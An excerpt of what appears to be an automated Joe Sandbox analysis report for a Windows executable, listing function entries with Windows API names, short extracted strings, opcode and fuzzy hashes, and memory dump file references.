                    • API ID: Message$DispatchObjectPeekSingleTranslateWait
                    • String ID:
                    • API String ID: 3621893840-0
                    • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                    • Instruction ID: e60366979cf0e94aa49be5e47b7d5b52a754647f2652ac04de9c076591f44f01
                    • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                    • Instruction Fuzzy Hash: 59F06221B3855682F710A720E45ABB6A251FFE4B05FC41131F98E41894DE7CD149C721
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: __except_validate_context_recordabort
                    • String ID: csm$csm
                    • API String ID: 746414643-3733052814
                    • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                    • Instruction ID: 3eb6b6548b0ee423cea802b3e414a597f236beb52ad55cd8b840535991f128e1
                    • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                    • Instruction Fuzzy Hash: 8F71D27290868186D768EF21D09137DFBA1EB00B8AF84C137DA5CC7A89CB7CD490C752
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: $*
                    • API String ID: 3215553584-3982473090
                    • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                    • Instruction ID: 4e01ff9cadf81d37ac1c93c149de263f5b3afa13125d1c73555b6d31e41edd4c
                    • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                    • Instruction Fuzzy Hash: 75516972D0CA428AE76DEF28848637C77A0FB05B1AF949137C64981199DFBCD4D1C626
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$StringType
                    • String ID: $%s
                    • API String ID: 3586891840-3791308623
                    • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                    • Instruction ID: c2bb7cd70e97231031d65fbdc7760252d17d50bd5bd99b4c65128335fb51135a
                    • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                    • Instruction Fuzzy Hash: 4E41D832B04B819AEF14DF26D9013A8A391FB48BA8F884236DE1D477C9DFBCE5518351
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: CreateFrameInfo__except_validate_context_recordabort
                    • String ID: csm
                    • API String ID: 2466640111-1018135373
                    • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                    • Instruction ID: ac8fbf3ec462e2145be73d26481b94e2ea2977e5219d2557d8e2686132098534
                    • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                    • Instruction Fuzzy Hash: 42519E76A1874187DB64EB15E18236EB7A4FB88BA1F804136EB8D87B41CF7CD050CB11
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ByteCharErrorFileLastMultiWideWrite
                    • String ID: U
                    • API String ID: 2456169464-4171548499
                    • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                    • Instruction ID: d4b04156731fa64aa00ee992c11f01b0825403d415c134550cf4f3561cc015f0
                    • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                    • Instruction Fuzzy Hash: BF410822B18A8182D721DF25E8453B9B7A0FB88794F844032EE4D87B48DFBCD551C711
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ObjectRelease
                    • String ID:
                    • API String ID: 1429681911-3916222277
                    • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                    • Instruction ID: ea188322775b2a6ef09a1cc3cf7f86b90375112bacd52787055dbcd873b8f63e
                    • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                    • Instruction Fuzzy Hash: 0631173570874286EB04EF12B81972AB7A0F789FD2F814476FD8A43B54CE7CE4498B10
                    APIs
                    • InitializeCriticalSection.KERNEL32(?,?,?,00007FF7E1DD317F,?,?,00001000,00007FF7E1DBE51D), ref: 00007FF7E1DCE8BB
                    • CreateSemaphoreW.KERNEL32(?,?,?,00007FF7E1DD317F,?,?,00001000,00007FF7E1DBE51D), ref: 00007FF7E1DCE8CB
                    • CreateEventW.KERNEL32(?,?,?,00007FF7E1DD317F,?,?,00001000,00007FF7E1DBE51D), ref: 00007FF7E1DCE8E4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                    • String ID: Thread pool initialization failed.
                    • API String ID: 3340455307-2182114853
                    • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                    • Instruction ID: ea35e65115aee546fcc256de5f1adb66b047d7c54fd39dd86340feb5ce66de24
                    • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                    • Instruction Fuzzy Hash: 76210872F1564186F710DF24D4467BD7692FFC8B08F588536CA0D0A294CFBE9455C7A2
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: CapsDeviceRelease
                    • String ID:
                    • API String ID: 127614599-3916222277
                    • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                    • Instruction ID: 4a6628df8858c1ed515a5387265bca992f9f518626ccc9c2a284925ef7e2aa25
                    • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                    • Instruction Fuzzy Hash: 48E0C220B0864186FB0867B6B59A23EA261AB4CFD1F568036FA5F43794CE7CC4C48310
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                    • String ID:
                    • API String ID: 1137671866-0
                    • Opcode ID: 6a66750d7d38e285348c6a4672a5517d432b12a502a6a2b91e6f62eece89d76d
                    • Instruction ID: 7fbf3de8c0db2bf8f78b7e027e3909769f94c532505eee317ade9ef0052019b9
                    • Opcode Fuzzy Hash: 6a66750d7d38e285348c6a4672a5517d432b12a502a6a2b91e6f62eece89d76d
                    • Instruction Fuzzy Hash: A8A1E622A18A8291EB10EB65D4427EDA371FF85798FC04533EA8E03AD9DFBCE544C311
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID:
                    • API String ID: 1452528299-0
                    • Opcode ID: 47ce399c8b5a93a9ee7e183f504d796df39c479f65169f8ae0637efe197c3b7b
                    • Instruction ID: a6183168362d61935950c6213dac6878d252f7af5ba5551481e0f0e8f32ac0fd
                    • Opcode Fuzzy Hash: 47ce399c8b5a93a9ee7e183f504d796df39c479f65169f8ae0637efe197c3b7b
                    • Instruction Fuzzy Hash: 4E51D472F14A4695FB00EB64D4463EC6321EBC8B98FC04633DA0D57799DEB8D544C362
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                    • String ID:
                    • API String ID: 1077098981-0
                    • Opcode ID: 5a43cb7f5a8bc2b697eb0b834037522765625dc86c8d5e2913923eaf6a834e49
                    • Instruction ID: 45c3e6c00d5f3dce04b19667af58279d67dd3c3e951f4730bbbb2083b6bac244
                    • Opcode Fuzzy Hash: 5a43cb7f5a8bc2b697eb0b834037522765625dc86c8d5e2913923eaf6a834e49
                    • Instruction Fuzzy Hash: 8D51C032B18B4286EB00DF21E4457AEB3B4FB88B84F901136EA8E57A58DF7DD544CB11
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                    • String ID:
                    • API String ID: 4141327611-0
                    • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                    • Instruction ID: 706e35900fcf556b737d81fecc64af3ddb52d6c47dea488a8929b6a0d9e4d5f5
                    • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                    • Instruction Fuzzy Hash: 4941A731E08A4246FB69EF109142379E2A0EF94BD1F94E132DA4D86AD9DFBCD4518722
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: FileMove_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3823481717-0
                    • Opcode ID: 47dbf0decc8272d9a7ae459b130201949f9107b8ec80fb87a20ec63cf3da1f82
                    • Instruction ID: 767bdac7a5adcc342b480e60783108169775250cf152fc4dcf10788f8a022523
                    • Opcode Fuzzy Hash: 47dbf0decc8272d9a7ae459b130201949f9107b8ec80fb87a20ec63cf3da1f82
                    • Instruction Fuzzy Hash: 1A41F262F1075184FF00EB79E8862AD6371FF44BA8B805632DE1D57A99DFB8C051C351
                    APIs
                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7E1DEC45B), ref: 00007FF7E1DF0B91
                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7E1DEC45B), ref: 00007FF7E1DF0BF3
                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7E1DEC45B), ref: 00007FF7E1DF0C2D
                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7E1DEC45B), ref: 00007FF7E1DF0C57
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                    • String ID:
                    • API String ID: 1557788787-0
                    • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                    • Instruction ID: 9c56179504854c7e90732f523115655c3bab9f77c9441f0dec9195d283ca5c34
                    • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                    • Instruction Fuzzy Hash: E421A731F18B5581E724EF11644122DF6A5FB5CBD0B884136DE8E63BA8DF7CE6628311
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ErrorLast$abort
                    • String ID:
                    • API String ID: 1447195878-0
                    • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                    • Instruction ID: 0ffdd9087d1fabada86ad231bf4e63a72f1ca3181ba29e86cce98791c6e22b66
                    • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                    • Instruction Fuzzy Hash: 1F01C014F08A0202FB1CF73065173B892915F54792FC4943AE81E827DAEDBCB8418233
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: CapsDevice$Release
                    • String ID:
                    • API String ID: 1035833867-0
                    • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                    • Instruction ID: 7513e4d2fa8874171c5d334cfbc1ccd8a10605ae3c819ebf5ecd197a167234bc
                    • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                    • Instruction Fuzzy Hash: 37E01260F0970282FF097B71685A336E191AF48B43F89447BF85F46350DD7CA195C721
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID: DXGIDebug.dll
                    • API String ID: 3668304517-540382549
                    • Opcode ID: af41f5b367367adcbbc9fbea96428c46d5ee0daf519fd66926152a8cf2950bdf
                    • Instruction ID: f911701dd195cd24e5758e08c03c597e6cca24382954c0ea0e0a6114e475b4b7
                    • Opcode Fuzzy Hash: af41f5b367367adcbbc9fbea96428c46d5ee0daf519fd66926152a8cf2950bdf
                    • Instruction Fuzzy Hash: F071CD72A14B8192EB14DB25E8413ADB3A8FB54794F804636DBAD03B99DFBCE061C340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: e+000$gfff
                    • API String ID: 3215553584-3030954782
